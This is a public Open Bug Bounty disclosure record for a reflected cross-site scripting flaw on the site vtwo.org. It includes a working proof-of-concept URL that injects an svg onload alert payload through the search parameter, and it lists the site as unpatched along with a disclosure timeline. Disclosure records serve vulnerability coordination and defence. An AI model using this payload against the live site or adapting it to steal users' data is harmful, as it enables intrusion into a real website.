vtwo.org XSS vulnerability

2017-09-22T12:28:00
ID OBB:306949
Type openbugbounty
Reporter eb
Modified 2017-12-21T14:18:00

Description

Vulnerable URL:
http://vtwo.org/search.php?q=%D9%BE%DB%8C%D8%A7%D8%AF%27%22%3E%3Csvg+onload%3D%22alert%28%27OPEN%27%22%3E%3Csvg+onload%3D%22alert%28%27OPENBUGBOUNTY%27%29%22%3EBUGBOUNTY%27%29%22%3E%D9%87+%D8%B3%D8%A7%D8%B2%DB%8C+%D8%A7%D9%84%DA%AF%D9%88%D8%B1%DB%8C%D8%AA%D9%85+Apriori+%D8%AF%D8%A7%D8%AF%D9%87+%DA%A9%D8%A7%D9%88%DB%8C+%D8%A8%D9%87+%D8%B2%D8%A8%D8%A7%D9%86+PHP〈=fa
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 21.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1034413
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 September, 2017 12:28 GMT
Generic security notifications sent to website owner| 22 September, 2017 13:35 GMT
Notification sent to subscribers (without technical details)| 22 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 21 December, 2017 14:18 GMT